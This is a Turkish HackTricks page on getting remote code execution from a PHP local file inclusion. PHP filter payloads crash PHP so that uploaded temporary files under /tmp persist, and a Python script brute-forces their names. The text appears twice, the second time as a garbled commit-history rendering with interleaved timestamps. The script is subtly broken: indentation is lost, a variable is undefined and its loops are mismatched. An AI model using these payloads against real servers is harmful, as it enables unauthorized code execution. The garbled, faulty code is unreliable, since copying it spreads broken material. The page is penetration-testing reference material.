hacktricks/pentesting-web/file-inclusion/lfi2rce-via-segmentation-fault.md

# LFI2RCE via Segmentasyon Hatası

<details>

<summary><strong>AWS hacklemeyi sıfırdan kahraman seviyesine öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>

HackTricks'ı desteklemenin diğer yolları:

* **Şirketinizi HackTricks'te reklamını görmek isterseniz** veya **HackTricks'i PDF olarak indirmek isterseniz** [**ABONELİK PLANLARINA**](https://github.com/sponsors/carlospolop) göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**The PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**'ı takip edin**.
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github reposuna **PR göndererek paylaşın**.

</details>

[https://spyclub.tech/2018/12/21/one-line-and-return-of-one-line-php-writeup/](https://spyclub.tech/2018/12/21/one-line-and-return-of-one-line-php-writeup/) (ikinci bölüm) ve [https://hackmd.io/@ZzDmROodQUynQsF9je3Q5Q/rJlfZva0m?type=view](https://hackmd.io/@ZzDmROodQUynQsF9je3Q5Q/rJlfZva0m?type=view) yazılarına göre, aşağıdaki payloadlar PHP'de bir segmentasyon hatasına neden olmuştur:
```php
// PHP 7.0
include("php://filter/string.strip_tags/resource=/etc/passwd");

// PHP 7.2
include("php://filter/convert.quoted-printable-encode/resource=data://,%bfAAAAAAAAAAAAAAAAAAAAAAA%ff%ff%ff%ff%ff%ff%ff%ffAAAAAAAAAAAAAAAAAAAAAAAA");
```
Bilmelisiniz ki, bir **dosya içeren** bir **POST** isteği **gönderirseniz**, PHP bu dosyanın içeriğiyle birlikte `/tmp/php<birşey>` dizininde geçici bir dosya oluşturur. Bu dosya istek işlendikten sonra **otomatik olarak silinir**.

Bir **LFI** bulursanız ve PHP'de bir **segmentasyon hatası tetiklemeyi başarırsanız**, geçici dosya **asla silinmez**. Bu nedenle, LFI zafiyetiyle bu dosyayı bulabilir ve keyfi kodu çalıştırabilirsiniz.

Test için [https://hub.docker.com/r/easyengine/php7.0](https://hub.docker.com/r/easyengine/php7.0) docker imajını kullanabilirsiniz.
```python
# upload file with segmentation fault
import requests
url = "http://localhost:8008/index.php?i=php://filter/string.strip_tags/resource=/etc/passwd"
files = {'file': open('la.php','rb')}
response = requests.post(url, files=files)


# Search for the file (improve this with threads)
import requests
import string
import threading

charset = string.ascii_letters + string.digits

host = "127.0.0.1"
port = 80
base_url = "http://%s:%d" % (host, port)


def bruteforce(charset):
for i in charset:
for j in charset:
for k in charset:
for l in charset:
for m in charset:
for n in charset:
filename = prefix + i + j + k
url = "%s/index.php?i=/tmp/php%s" % (base_url, filename)
print url
response = requests.get(url)
if 'spyd3r' in response.content:
print "[+] Include success!"
return True


def main():
bruteforce(charset)

if __name__ == "__main__":
main()
```
<details>

<summary><strong>Sıfırdan kahraman olmak için AWS hackleme öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>

HackTricks'ı desteklemenin diğer yolları:

* **Şirketinizi HackTricks'te reklamını görmek** veya **HackTricks'i PDF olarak indirmek** için [**ABONELİK PLANLARI'na**](https://github.com/sponsors/carlospolop) göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**The PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**'ı takip edin**.
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına **PR göndererek paylaşın**.

</details>
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								# LFI2RCE via Segmentasyon Hatası
-												GitBook: [#3679] No subject

											
										
										
											2022-12-14 00:23:57 +00:00
 								<details>
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								<summary><strong>AWS hacklemeyi sıfırdan kahraman seviyesine öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
-												GitBook: [#3679] No subject

											
										
										
											2022-12-14 00:23:57 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								HackTricks'ı desteklemenin diğer yolları:
-												a

											
										
										
											2024-02-03 16:02:14 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								* **Şirketinizi HackTricks'te reklamını görmek isterseniz** veya **HackTricks'i PDF olarak indirmek isterseniz** [**ABONELİK PLANLARINA**](https://github.com/sponsors/carlospolop) göz atın!
 								* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
 								* [**The PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
 								* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**'ı takip edin**.
 								* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github reposuna **PR göndererek paylaşın**.
-												GitBook: [#3679] No subject

											
										
										
											2022-12-14 00:23:57 +00:00
 								</details>
-												a

											
										
										
											2024-02-05 20:00:40 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								[https://spyclub.tech/2018/12/21/one-line-and-return-of-one-line-php-writeup/](https://spyclub.tech/2018/12/21/one-line-and-return-of-one-line-php-writeup/) (ikinci bölüm) ve [https://hackmd.io/@ZzDmROodQUynQsF9je3Q5Q/rJlfZva0m?type=view](https://hackmd.io/@ZzDmROodQUynQsF9je3Q5Q/rJlfZva0m?type=view) yazılarına göre, aşağıdaki payloadlar PHP'de bir segmentasyon hatasına neden olmuştur:
-												GitBook: [#3679] No subject

											
										
										
											2022-12-14 00:23:57 +00:00
+								```php
 								// PHP 7.0
 								include("php://filter/string.strip_tags/resource=/etc/passwd");
 								// PHP 7.2
 								include("php://filter/convert.quoted-printable-encode/resource=data://,%bfAAAAAAAAAAAAAAAAAAAAAAA%ff%ff%ff%ff%ff%ff%ff%ffAAAAAAAAAAAAAAAAAAAAAAAA");
 								```
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								Bilmelisiniz ki, bir **dosya içeren** bir **POST** isteği **gönderirseniz**, PHP bu dosyanın içeriğiyle birlikte `/tmp/php<birşey>` dizininde geçici bir dosya oluşturur. Bu dosya istek işlendikten sonra **otomatik olarak silinir**.
-												GitBook: [#3679] No subject

											
										
										
											2022-12-14 00:23:57 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								Bir **LFI** bulursanız ve PHP'de bir **segmentasyon hatası tetiklemeyi başarırsanız**, geçici dosya **asla silinmez**. Bu nedenle, LFI zafiyetiyle bu dosyayı bulabilir ve keyfi kodu çalıştırabilirsiniz.
-												GitBook: [#3679] No subject

											
										
										
											2022-12-14 00:23:57 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								Test için [https://hub.docker.com/r/easyengine/php7.0](https://hub.docker.com/r/easyengine/php7.0) docker imajını kullanabilirsiniz.
-												GitBook: [#3679] No subject

											
										
										
											2022-12-14 00:23:57 +00:00
+								```python
 								# upload file with segmentation fault
 								import requests
 								url = "http://localhost:8008/index.php?i=php://filter/string.strip_tags/resource=/etc/passwd"
 								files = {'file': open('la.php','rb')}
 								response = requests.post(url, files=files)
 								# Search for the file (improve this with threads)
 								import requests
 								import string
 								import threading
 								charset = string.ascii_letters + string.digits
 								host = "127.0.0.1"
 								port = 80
 								base_url = "http://%s:%d" % (host, port)
 								def bruteforce(charset):
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								for i in charset:
 								for j in charset:
 								for k in charset:
 								for l in charset:
 								for m in charset:
 								for n in charset:
 								filename = prefix + i + j + k
 								url = "%s/index.php?i=/tmp/php%s" % (base_url, filename)
 								print url
 								response = requests.get(url)
 								if 'spyd3r' in response.content:
 								print "[+] Include success!"
 								return True
-												GitBook: [#3679] No subject

											
										
										
											2022-12-14 00:23:57 +00:00
 								def main():
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								bruteforce(charset)
-												GitBook: [#3679] No subject

											
										
										
											2022-12-14 00:23:57 +00:00
 								if __name__ == "__main__":
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								main()
-												GitBook: [#3679] No subject

											
										
										
											2022-12-14 00:23:57 +00:00
+								```
 								<details>
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								<summary><strong>Sıfırdan kahraman olmak için AWS hackleme öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
-												GitBook: [#3679] No subject

											
										
										
											2022-12-14 00:23:57 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								HackTricks'ı desteklemenin diğer yolları:
-												a

											
										
										
											2024-02-03 16:02:14 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								* **Şirketinizi HackTricks'te reklamını görmek** veya **HackTricks'i PDF olarak indirmek** için [**ABONELİK PLANLARI'na**](https://github.com/sponsors/carlospolop) göz atın!
 								* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
 								* [**The PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
 								* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**'ı takip edin**.
 								* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına **PR göndererek paylaşın**.
-												GitBook: [#3679] No subject

											
										
										
											2022-12-14 00:23:57 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								</details>